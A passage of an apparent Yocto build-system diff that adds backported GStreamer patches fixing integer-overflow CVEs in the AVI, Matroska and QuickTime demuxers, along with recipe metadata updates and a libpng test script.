++ if (blocksize > G_MAXSIZE - WAVPACK4_HEADER_SIZE) {
++ GST_ERROR_OBJECT (element, "Too big wavpack buffer");
++ gst_buffer_unmap (*buf, &map);
++ g_object_unref (adapter);
++ return GST_FLOW_ERROR;
++ }
++
+ g_assert (newbuf == NULL);
+
+ newbuf =
+--
+GitLab
+
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1921.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1921.patch
new file mode 100644
index 0000000000..99dbb2b1b0
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1921.patch
@@ -0,0 +1,69 @@
+From f503caad676971933dc0b52c4b313e5ef0d6dbb0 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
+Date: Wed, 18 May 2022 12:00:48 +0300
+Subject: [PATCH] avidemux: Fix integer overflow resulting in heap corruption
+ in DIB buffer inversion code
+
+Check that width*bpp/8 doesn't overflow a guint and also that
+height*stride fits into the provided buffer without overflowing.
+
+Thanks to Adam Doupe for analyzing and reporting the issue.
+
+CVE: CVE-2022-1921
+
+See https://gstreamer.freedesktop.org/security/sa-2022-0001.html
+
+Fixes https://gitlab.freedesktop.org/gstreamer/gstreamer/-/issues/1224
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/2608>
+
+https://gitlab.freedesktop.org/gstreamer/gstreamer/-/commit/f503caad676971933dc0b52c4b313e5ef0d6dbb0
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ .../gst/avi/gstavidemux.c | 17 ++++++++++++++---
+ 1 file changed, 14 insertions(+), 3 deletions(-)
+
+diff --git a/gst/avi/gstavidemux.c b/gst/avi/gstavidemux.c
+index eafe865494c..0d18a6495c7 100644
+--- a/gst/avi/gstavidemux.c
++++ b/gst/avi/gstavidemux.c
+@@ -4973,8 +4973,8 @@ swap_line (guint8 * d1, guint8 * d2, guint8 * tmp, gint bytes)
+ static GstBuffer *
+ gst_avi_demux_invert (GstAviStream * stream, GstBuffer * buf)
+ {
+- gint y, w, h;
+- gint bpp, stride;
++ guint y, w, h;
++ guint bpp, stride;
+ guint8 *tmp = NULL;
+ GstMapInfo map;
+ guint32 fourcc;
+@@ -5001,12 +5001,23 @@ gst_avi_demux_invert (GstAviStream * stream, GstBuffer * buf)
+ h = stream->strf.vids->height;
+ w = stream->strf.vids->width;
+ bpp = stream->strf.vids->bit_cnt ? stream->strf.vids->bit_cnt : 8;
++
++ if ((guint64) w * ((guint64) bpp / 8) > G_MAXUINT - 4) {
++ GST_WARNING ("Width x stride overflows");
++ return buf;
++ }
++
++ if (w == 0 || h == 0) {
++ GST_WARNING ("Zero width or height");
++ return buf;
++ }
++
+ stride = GST_ROUND_UP_4 (w * (bpp / 8));
+
+ buf = gst_buffer_make_writable (buf);
+
+ gst_buffer_map (buf, &map, GST_MAP_READWRITE);
+- if (map.size < (stride * h)) {
++ if (map.size < ((guint64) stride * (guint64) h)) {
+ GST_WARNING ("Buffer is smaller than reported Width x Height x Depth");
+ gst_buffer_unmap (buf, &map);
+ return buf;
+--
+GitLab
+
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1922-1923-1924-1925.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1922-1923-1924-1925.patch
new file mode 100644
index 0000000000..ebffbc473d
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1922-1923-1924-1925.patch
@@ -0,0 +1,214 @@
+From ad6012159acf18c6b5c0f4edf037e8c9a2dbc966 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
+Date: Wed, 18 May 2022 11:24:37 +0300
+Subject: [PATCH] matroskademux: Fix integer overflows in zlib/bz2/etc
+ decompression code
+
+Various variables were of smaller types than needed and there were no
+checks for any overflows when doing additions on the sizes. This is all
+checked now.
+
+In addition the size of the decompressed data is limited to 120MB now as
+any larger sizes are likely pathological and we can avoid out of memory
+situations in many cases like this.
+
+Also fix a bug where the available output size on the next iteration in
+the zlib/bz2 decompression code was provided too large and could
+potentially lead to out of bound writes.
+
+Thanks to Adam Doupe for analyzing and reporting the issue.
+
+CVE: CVE-2022-1922, CVE-2022-1923, CVE-2022-1924, CVE-2022-1925
+
+https://gstreamer.freedesktop.org/security/sa-2022-0002.html
+
+Fixes https://gitlab.freedesktop.org/gstreamer/gstreamer/-/issues/1225
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/2610>
+
+CVE: CVE-2022-1922 CVE-2022-1923 CVE-2022-1924 CVE-2022-1925
+https://gitlab.freedesktop.org/gstreamer/gstreamer/-/commit/ad6012159acf18c6b5c0f4edf037e8c9a2dbc966
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ .../gst/matroska/matroska-read-common.c | 76 +++++++++++++++----
+ 1 file changed, 61 insertions(+), 15 deletions(-)
+
+diff --git a/gst/matroska/matroska-read-common.c b/gst/matroska/matroska-read-common.c
+index eb317644cc5..6fadbba9567 100644
+--- a/gst/matroska/matroska-read-common.c
++++ b/gst/matroska/matroska-read-common.c
+@@ -70,6 +70,10 @@ typedef struct
+ gboolean audio_only;
+ } TargetTypeContext;
+
++/* 120MB as maximum decompressed data size. Anything bigger is likely
++ * pathological, and like this we avoid out of memory situations in many cases
++ */
++#define MAX_DECOMPRESS_SIZE (120 * 1024 * 1024)
+
+ static gboolean
+ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+@@ -77,19 +81,23 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+ GstMatroskaTrackCompressionAlgorithm algo)
+ {
+ guint8 *new_data = NULL;
+- guint new_size = 0;
++ gsize new_size = 0;
+ guint8 *data = *data_out;
+- guint size = *size_out;
++ const gsize size = *size_out;
+ gboolean ret = TRUE;
+
++ if (size > G_MAXUINT32) {
++ GST_WARNING ("too large compressed data buffer.");
++ ret = FALSE;
++ goto out;
++ }
++
+ if (algo == GST_MATROSKA_TRACK_COMPRESSION_ALGORITHM_ZLIB) {
+ #ifdef HAVE_ZLIB
+ /* zlib encoded data */
+ z_stream zstream;
+- guint orig_size;
+ int result;
+
+- orig_size = size;
+ zstream.zalloc = (alloc_func) 0;
+ zstream.zfree = (free_func) 0;
+ zstream.opaque = (voidpf) 0;
+@@ -99,8 +107,8 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+ goto out;
+ }
+ zstream.next_in = (Bytef *) data;
+- zstream.avail_in = orig_size;
+- new_size = orig_size;
++ zstream.avail_in = size;
++ new_size = size;
+ new_data = g_malloc (new_size);
+ zstream.avail_out = new_size;
+ zstream.next_out = (Bytef *) new_data;
+@@ -114,10 +122,18 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+ break;
+ }
+
++ if (new_size > G_MAXSIZE - 4096 || new_size + 4096 > MAX_DECOMPRESS_SIZE) {
++ GST_WARNING ("too big decompressed data");
++ result = Z_MEM_ERROR;
++ break;
++ }
++
+ new_size += 4096;
+ new_data = g_realloc (new_data, new_size);
+ zstream.next_out = (Bytef *) (new_data + zstream.total_out);
+- zstream.avail_out += 4096;
++ /* avail_out is an unsigned int */
++ g_assert (new_size - zstream.total_out <= G_MAXUINT);
++ zstream.avail_out = new_size - zstream.total_out;
+ } while (zstream.avail_in > 0);
+
+ if (result != Z_STREAM_END) {
+@@ -137,13 +153,11 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+ #ifdef HAVE_BZ2
+ /* bzip2 encoded data */
+ bz_stream bzstream;
+- guint orig_size;
+ int result;
+
+ bzstream.bzalloc = NULL;
+ bzstream.bzfree = NULL;
+ bzstream.opaque = NULL;
+- orig_size = size;
+
+ if (BZ2_bzDecompressInit (&bzstream, 0, 0) != BZ_OK) {
+ GST_WARNING ("bzip2 initialization failed.");
+@@ -152,8 +166,8 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+ }
+
+ bzstream.next_in = (char *) data;
+- bzstream.avail_in = orig_size;
+- new_size = orig_size;
++ bzstream.avail_in = size;
++ new_size = size;
+ new_data = g_malloc (new_size);
+ bzstream.avail_out = new_size;
+ bzstream.next_out = (char *) new_data;
+@@ -167,17 +181,31 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+ break;
+ }
+
++ if (new_size > G_MAXSIZE - 4096 || new_size + 4096 > MAX_DECOMPRESS_SIZE) {
++ GST_WARNING ("too big decompressed data");
++ result = BZ_MEM_ERROR;
++ break;
++ }
++
+ new_size += 4096;
+ new_data = g_realloc (new_data, new_size);
+- bzstream.next_out = (char *) (new_data + bzstream.total_out_lo32);
+- bzstream.avail_out += 4096;
++ bzstream.next_out =
++ (char *) (new_data + ((guint64) bzstream.total_out_hi32 << 32) +
++ bzstream.total_out_lo32);
++ /* avail_out is an unsigned int */
++ g_assert (new_size - ((guint64) bzstream.total_out_hi32 << 32) +
++ bzstream.total_out_lo32 <= G_MAXUINT);
++ bzstream.avail_out =
++ new_size - ((guint64) bzstream.total_out_hi32 << 32) +
++ bzstream.total_out_lo32;
+ } while (bzstream.avail_in > 0);
+
+ if (result != BZ_STREAM_END) {
+ ret = FALSE;
+ g_free (new_data);
+ } else {
+- new_size = bzstream.total_out_lo32;
++ new_size =
++ ((guint64) bzstream.total_out_hi32 << 32) + bzstream.total_out_lo32;
+ }
+ BZ2_bzDecompressEnd (&bzstream);
+
+@@ -189,7 +217,13 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+ } else if (algo == GST_MATROSKA_TRACK_COMPRESSION_ALGORITHM_LZO1X) {
+ /* lzo encoded data */
+ int result;
+- int orig_size, out_size;
++ gint orig_size, out_size;
++
++ if (size > G_MAXINT) {
++ GST_WARNING ("too large compressed data buffer.");
++ ret = FALSE;
++ goto out;
++ }
+
+ orig_size = size;
+ out_size = size;
+@@ -203,6 +237,11 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+ result = lzo1x_decode (new_data, &out_size, data, &orig_size);
+
+ if (orig_size > 0) {
++ if (new_size > G_MAXINT - 4096 || new_size + 4096 > MAX_DECOMPRESS_SIZE) {
++ GST_WARNING ("too big decompressed data");
++ result = LZO_ERROR;
++ break;
++ }
+ new_size += 4096;
+ new_data = g_realloc (new_data, new_size);
+ }
+@@ -221,6 +260,13 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+ } else if (algo == GST_MATROSKA_TRACK_COMPRESSION_ALGORITHM_HEADERSTRIP) {
+ /* header stripped encoded data */
+ if (enc->comp_settings_length > 0) {
++ if (size > G_MAXSIZE - enc->comp_settings_length
++ || size + enc->comp_settings_length > MAX_DECOMPRESS_SIZE) {
++ GST_WARNING ("too big decompressed data");
++ ret = FALSE;
++ goto out;
++ }
++
+ new_data = g_malloc (size + enc->comp_settings_length);
+ new_size = size + enc->comp_settings_length;
+
+--
+GitLab
+
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-2122.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-2122.patch
new file mode 100644
index 0000000000..f4d38c270e
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-2122.patch
@@ -0,0 +1,60 @@
+From 14d306da6da51a762c4dc701d161bb52ab66d774 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
+Date: Mon, 30 May 2022 10:15:37 +0300
+Subject: [PATCH] qtdemux: Fix integer overflows in zlib decompression code
+
+Various variables were of smaller types than needed and there were no
+checks for any overflows when doing additions on the sizes. This is all
+checked now.
+
+In addition the size of the decompressed data is limited to 200MB now as
+any larger sizes are likely pathological and we can avoid out of memory
+situations in many cases like this.
+
+Also fix a bug where the available output size on the next iteration in
+the zlib decompression code was provided too large and could
+potentially lead to out of bound writes.
+
+Thanks to Adam Doupe for analyzing and reporting the issue.
+
+CVE: tbd
+
+https://gstreamer.freedesktop.org/security/sa-2022-0003.html
+
+Fixes https://gitlab.freedesktop.org/gstreamer/gstreamer/-/issues/1225
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/2610>
+
+https://gitlab.freedesktop.org/gstreamer/gstreamer/-/commit/14d306da6da51a762c4dc701d161bb52ab66d774
+CVE: CVE-2022-2122
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ gst/isomp4/qtdemux.c | 8 +++++++-
+ 1 file changed, 7 insertions(+), 1 deletion(-)
+
+diff --git a/gst/isomp4/qtdemux.c b/gst/isomp4/qtdemux.c
+index 7cc346b1e63..97ba0799a8d 100644
+--- a/gst/isomp4/qtdemux.c
++++ b/gst/isomp4/qtdemux.c
+@@ -7905,10 +7905,16 @@ qtdemux_inflate (void *z_buffer, guint z_length, guint * length)
+ break;
+ }
+
++ if (*length > G_MAXUINT - 4096 || *length > QTDEMUX_MAX_SAMPLE_INDEX_SIZE) {
++ GST_WARNING ("too big decompressed data");
++ ret = Z_MEM_ERROR;
++ break;
++ }
++
+ *length += 4096;
+ buffer = (guint8 *) g_realloc (buffer, *length);
+ z.next_out = (Bytef *) (buffer + z.total_out);
+- z.avail_out += 4096;
++ z.avail_out += *length - z.total_out;
+ } while (z.avail_in > 0);
+
+ if (ret != Z_STREAM_END) {
+--
+GitLab
+
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.16.3.bb
index 75dd029109..831a317a82 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.16.3.bb
@@ -1,9 +1,19 @@
require gstreamer1.0-plugins-common.inc
+DESCRIPTION = "'Good' GStreamer plugins"
+HOMEPAGE = "https://gstreamer.freedesktop.org/"
+BUGTRACKER = "https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/issues"
+
SRC_URI = " \
https://gstreamer.freedesktop.org/src/gst-plugins-good/gst-plugins-good-${PV}.tar.xz \
file://0001-qmlgl-ensure-Qt-defines-GLsync-to-fix-compile-on-som.patch \
file://0001-qt-include-ext-qt-gstqtgl.h-instead-of-gst-gl-gstglf.patch \
+ file://CVE-2021-3497.patch \
+ file://CVE-2021-3498.patch \
+ file://CVE-2022-1920.patch \
+ file://CVE-2022-1921.patch \
+ file://CVE-2022-1922-1923-1924-1925.patch \
+ file://CVE-2022-2122.patch \
"
SRC_URI[md5sum] = "c79b6c2f8eaadb2bb66615b694db399e"
@@ -30,6 +40,8 @@ X11DEPENDS = "virtual/libx11 libsm libxrender libxfixes libxdamage"
X11ENABLEOPTS = "-Dximagesrc=enabled -Dximagesrc-xshm=enabled -Dximagesrc-xfixes=enabled -Dximagesrc-xdamage=enabled"
X11DISABLEOPTS = "-Dximagesrc=disabled -Dximagesrc-xshm=disabled -Dximagesrc-xfixes=disabled -Dximagesrc-xdamage=disabled"
+QT5WAYLANDDEPENDS = "${@bb.utils.contains("DISTRO_FEATURES", "wayland", "qtwayland", "", d)}"
+
PACKAGECONFIG[bz2] = "-Dbz2=enabled,-Dbz2=disabled,bzip2"
PACKAGECONFIG[cairo] = "-Dcairo=enabled,-Dcairo=disabled,cairo"
PACKAGECONFIG[dv1394] = "-Ddv1394=enabled,-Ddv1394=disabled,libiec61883 libavc1394 libraw1394"
@@ -44,7 +56,7 @@ PACKAGECONFIG[libpng] = "-Dpng=enabled,-Dpng=disabled,libpng"
PACKAGECONFIG[libv4l2] = "-Dv4l2-libv4l2=enabled,-Dv4l2-libv4l2=disabled,v4l-utils"
PACKAGECONFIG[mpg123] = "-Dmpg123=enabled,-Dmpg123=disabled,mpg123"
PACKAGECONFIG[pulseaudio] = "-Dpulse=enabled,-Dpulse=disabled,pulseaudio"
-PACKAGECONFIG[qt5] = "-Dqt5=enabled,-Dqt5=disabled,qtbase qtdeclarative qtbase-native"
+PACKAGECONFIG[qt5] = "-Dqt5=enabled,-Dqt5=disabled,qtbase qtdeclarative qtbase-native ${QT5WAYLANDDEPENDS}"
PACKAGECONFIG[soup] = "-Dsoup=enabled,-Dsoup=disabled,libsoup-2.4"
PACKAGECONFIG[speex] = "-Dspeex=enabled,-Dspeex=disabled,speex"
PACKAGECONFIG[taglib] = "-Dtaglib=enabled,-Dtaglib=disabled,taglib"
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.16.3.bb
index d9ec82d887..afde9a013d 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.16.3.bb
@@ -1,5 +1,9 @@
require gstreamer1.0-plugins-common.inc
+DESCRIPTION = "'Ugly GStreamer plugins"
+HOMEPAGE = "https://gstreamer.freedesktop.org/"
+BUGTRACKER = "https://gitlab.freedesktop.org/gstreamer/gst-plugins-ugly/-/issues"
+
LIC_FILES_CHKSUM = "file://COPYING;md5=a6f89e2100d9b6cdffcea4f398e37343 \
file://tests/check/elements/xingmux.c;beginline=1;endline=21;md5=4c771b8af188724855cb99cadd390068"
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.16.3.bb
index 14b34a2808..9c7f0e078c 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.16.3.bb
@@ -1,4 +1,6 @@
SUMMARY = "Python bindings for GStreamer 1.0"
+DESCRIPTION = "GStreamer Python binding overrides (complementing the bindings \
+provided by python-gi) "
HOMEPAGE = "http://cgit.freedesktop.org/gstreamer/gst-python/"
SECTION = "multimedia"
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-rtsp-server_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-rtsp-server_1.16.3.bb
index 5f1b1d44fa..ed51a5693e 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-rtsp-server_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-rtsp-server_1.16.3.bb
@@ -29,3 +29,5 @@ GIR_MESON_DISABLE_FLAG = "disabled"
# Starting with 1.8.0 gst-rtsp-server includes dependency-less plugins as well
require gstreamer1.0-plugins-packaging.inc
+
+CVE_PRODUCT += "gst-rtsp-server"
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.16.3.bb
index 9d9b1b8757..af9b2c5a97 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.16.3.bb
@@ -1,4 +1,5 @@
SUMMARY = "VA-API support to GStreamer"
+HOMEPAGE = "https://gstreamer.freedesktop.org/"
DESCRIPTION = "gstreamer-vaapi consists of a collection of VA-API \
based plugins for GStreamer and helper libraries: `vaapidecode', \
`vaapiconvert', and `vaapisink'."
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0/0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0/0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch
new file mode 100644
index 0000000000..e32f3c101f
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0/0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch
@@ -0,0 +1,33 @@
+From 1db36347d05d88835519368442e9aa89c64091ad Mon Sep 17 00:00:00 2001
+From: Seungha Yang <seungha@centricular.com>
+Date: Tue, 15 Sep 2020 00:54:58 +0900
+Subject: [PATCH] tests: seek: Don't use too strict timeout for validation
+
+Expected segment-done message might not be seen within expected
+time if system is not powerful enough.
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/625>
+
+Upstream-Status: Backport [https://cgit.freedesktop.org/gstreamer/gstreamer/commit?id=f44312ae5d831438fcf8041162079c65321c588c]
+Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
+Signed-off-by: Jose Quaresma <quaresma.jose@gmail.com>
+---
+ tests/check/pipelines/seek.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/tests/check/pipelines/seek.c b/tests/check/pipelines/seek.c
+index 28bb8846d..5f7447bc5 100644
+--- a/tests/check/pipelines/seek.c
++++ b/tests/check/pipelines/seek.c
+@@ -521,7 +521,7 @@ GST_START_TEST (test_loopback_2)
+
+ GST_INFO ("wait for segment done message");
+
+- msg = gst_bus_timed_pop_filtered (bus, (GstClockTime) 2 * GST_SECOND,
++ msg = gst_bus_timed_pop_filtered (bus, GST_CLOCK_TIME_NONE,
+ GST_MESSAGE_SEGMENT_DONE | GST_MESSAGE_ERROR);
+ fail_unless (msg, "no message within the timed window");
+ fail_unless_equals_string (GST_MESSAGE_TYPE_NAME (msg), "segment-done");
+--
+2.29.2
+
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb
index 7afe56cd7b..14793b7fdf 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb
@@ -22,6 +22,7 @@ SRC_URI = " \
file://0003-meson-Add-valgrind-feature.patch \
file://0004-meson-Add-option-for-installed-tests.patch \
file://0005-bufferpool-only-resize-in-reset-when-maxsize-is-larger.patch \
+ file://0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch \
"
SRC_URI[md5sum] = "beecf6965a17fb17fa3b262fd36df70a"
SRC_URI[sha256sum] = "692f037968e454e508b0f71d9674e2e26c78475021407fcf8193b1c7e59543c7"
@@ -40,7 +41,7 @@ PACKAGECONFIG[unwind] = "-Dlibunwind=enabled,-Dlibunwind=disabled,libunwind"
PACKAGECONFIG[dw] = "-Dlibdw=enabled,-Dlibdw=disabled,elfutils"
PACKAGECONFIG[bash-completion] = "-Dbash-completion=enabled,-Dbash-completion=disabled,bash-completion"
PACKAGECONFIG[tools] = "-Dtools=enabled,-Dtools=disabled"
-PACKAGECONFIG[setcap] = ",,libcap libcap-native"
+PACKAGECONFIG[setcap] = "-Dptp-helper-permissions=capabilities,,libcap libcap-native"
# TODO: put this in a gettext.bbclass patch
def gettext_oemeson(d):
@@ -74,4 +75,20 @@ FILES_${PN}-dbg += "${datadir}/gdb ${datadir}/gstreamer-1.0/gdb"
CVE_PRODUCT = "gstreamer"
+# CPE entries for gst-plugins-base are listed as gstreamer issues
+# so we need to ignore the false hits
+CVE_CHECK_WHITELIST += "CVE-2021-3522"
+
+# CPE entries for gst-plugins-good are listed as gstreamer issues
+# so we need to ignore the false hits
+CVE_CHECK_WHITELIST += "CVE-2021-3497"
+CVE_CHECK_WHITELIST += "CVE-2021-3498"
+CVE_CHECK_WHITELIST += "CVE-2022-1920"
+CVE_CHECK_WHITELIST += "CVE-2022-1921"
+CVE_CHECK_WHITELIST += "CVE-2022-1922"
+CVE_CHECK_WHITELIST += "CVE-2022-1923"
+CVE_CHECK_WHITELIST += "CVE-2022-1924"
+CVE_CHECK_WHITELIST += "CVE-2022-1925"
+CVE_CHECK_WHITELIST += "CVE-2022-2122"
+
require gstreamer1.0-ptest.inc
diff --git a/meta/recipes-multimedia/lame/lame_3.100.bb b/meta/recipes-multimedia/lame/lame_3.100.bb
index 7f8996fb52..d007e0a495 100644
--- a/meta/recipes-multimedia/lame/lame_3.100.bb
+++ b/meta/recipes-multimedia/lame/lame_3.100.bb
@@ -1,5 +1,6 @@
SUMMARY = "High quality MP3 audio encoder"
-HOMEPAGE = "http://lame.sourceforge.net/"
+DESCRIPTION = "LAME is an educational tool to be used for learning about MP3 encoding."
+HOMEPAGE = "https://lame.sourceforge.io/"
BUGTRACKER = "http://sourceforge.net/tracker/?group_id=290&atid=100290"
SECTION = "console/utils"
LICENSE = "LGPLv2+"
diff --git a/meta/recipes-multimedia/liba52/liba52_0.7.4.bb b/meta/recipes-multimedia/liba52/liba52_0.7.4.bb
index 8ff8889b60..0ef5d947c3 100644
--- a/meta/recipes-multimedia/liba52/liba52_0.7.4.bb
+++ b/meta/recipes-multimedia/liba52/liba52_0.7.4.bb
@@ -1,4 +1,7 @@
SUMMARY = "ATSC A/52 surround sound stream decoder"
+DESCRIPTION = "Library for decoding ATSC A/52 streams. The A/52 standard \
+is used in a variety of applications, including digital television \
+and DVD. It is also known as AC-3."
HOMEPAGE = "http://liba52.sourceforge.net/"
LICENSE = "GPLv2+"
LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3 \
diff --git a/meta/recipes-multimedia/libid3tag/libid3tag/cflags_filter.patch b/meta/recipes-multimedia/libid3tag/libid3tag/cflags_filter.patch
new file mode 100644
index 0000000000..0d1d0dc381
--- /dev/null
+++ b/meta/recipes-multimedia/libid3tag/libid3tag/cflags_filter.patch
@@ -0,0 +1,21 @@
+configure contains CFLAGS filtering code which was removing our prefix-map
+flags. We need those to generate reproducible binaries. Allow them through.
+
+Upstream-Status: Pending
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+
+Index: libid3tag-0.15.1b/configure.ac
+===================================================================
+--- libid3tag-0.15.1b.orig/configure.ac
++++ libid3tag-0.15.1b/configure.ac
+@@ -99,6 +99,10 @@ do
+ -mno-cygwin)
+ shift
+ ;;
++ -fmacro-prefix-map*|-fdebug-prefix-map*)
++ CFLAGS="$CFLAGS $1"
++ shift
++ ;;
+ -m*)
+ arch="$arch $1"
+ shift
diff --git a/meta/recipes-multimedia/libid3tag/libid3tag_0.15.1b.bb b/meta/recipes-multimedia/libid3tag/libid3tag_0.15.1b.bb
index 0312a610c0..80581765ac 100644
--- a/meta/recipes-multimedia/libid3tag/libid3tag_0.15.1b.bb
+++ b/meta/recipes-multimedia/libid3tag/libid3tag_0.15.1b.bb
@@ -15,6 +15,7 @@ SRC_URI = "${SOURCEFORGE_MIRROR}/mad/libid3tag-${PV}.tar.gz \
file://0001-Fix-gperf-3.1-incompatibility.patch \
file://10_utf16.patch \
file://unknown-encoding.patch \
+ file://cflags_filter.patch \
"
UPSTREAM_CHECK_URI = "https://sourceforge.net/projects/mad/files/libid3tag/"
UPSTREAM_CHECK_REGEX = "/projects/mad/files/libid3tag/(?P<pver>.*)/$"
diff --git a/meta/recipes-multimedia/libomxil/libomxil_0.9.3.bb b/meta/recipes-multimedia/libomxil/libomxil_0.9.3.bb
index 271c2a30a3..8f3b76a920 100644
--- a/meta/recipes-multimedia/libomxil/libomxil_0.9.3.bb
+++ b/meta/recipes-multimedia/libomxil/libomxil_0.9.3.bb
@@ -4,7 +4,7 @@ DESCRIPTION = "Bellagio is an opensource implementation of the Khronos OpenMAX \
HOMEPAGE = "http://omxil.sourceforge.net/"
LICENSE = "LGPLv2.1+"
-LICENSE_FLAGS = "commercial"
+LICENSE_FLAGS = "${@bb.utils.contains('PACKAGECONFIG', 'amr', 'commercial', '', d)}"
LIC_FILES_CHKSUM = "file://COPYING;md5=ae6f0f4dbc7ac193b50f323a6ae191cb \
file://src/omxcore.h;beginline=1;endline=27;md5=806b1e5566c06486fe8e42b461e03a90"
@@ -26,6 +26,10 @@ EXTRA_OECONF += "--disable-doc --disable-Werror"
PROVIDES += "virtual/libomxil"
+PACKAGECONFIG ??= ""
+
+PACKAGECONFIG[amr] = "--enable-amr,,"
+
#
# The .so files under ${libdir}/bellagio are not intended to be versioned and symlinked.
# Make sure they get packaged in the main package.
diff --git a/meta/recipes-multimedia/libpng/files/run-ptest b/meta/recipes-multimedia/libpng/files/run-ptest
new file mode 100644
index 0000000000..9ab5d0c1f4
--- /dev/null
+++ b/meta/recipes-multimedia/libpng/files/run-ptest
@@ -0,0 +1,29 @@
+#!/bin/sh
+
+set -eux
+
+./pngfix pngtest.png &> log.txt 2>&1
+
+if grep -i "OK" log.txt 2>&1 ; then
+ echo "PASS: pngfix passed"
+else
+ echo "FAIL: pngfix failed"
+fi
+rm -f log.txt
+
+./pngtest pngtest.png &> log.txt 2>&1
+
+if grep -i "PASS" log.txt 2>&1 ; then
+ echo "PASS: pngtest passed"
+else
+ echo "FAIL: pngtest failed"
+fi
+rm -f log.txt
+
+for i in pngstest timepng; do
+ if "./${i}" pngtest.png 2>&1; then
+ echo "PASS: $i"
+ else
+ echo "FAIL: $i"
+ fi
+done
diff --git a/meta/recipes-multimedia/libpng/libpng_1.6.37.bb b/meta/recipes-multimedia/libpng/libpng_1.6.37.bb
index 8c53d11642..9387fc8e2e 100644
--- a/meta/recipes-multimedia/libpng/libpng_1.6.37.bb
+++ b/meta/recipes-multimedia/libpng/libpng_1.6.37.bb
@@ -1,4 +1,7 @@
SUMMARY = "PNG image format decoding library"
+DESCRIPTION = "An open source project to develop and maintain the reference \
+library for use in applications that read, create, and manipulate PNG \
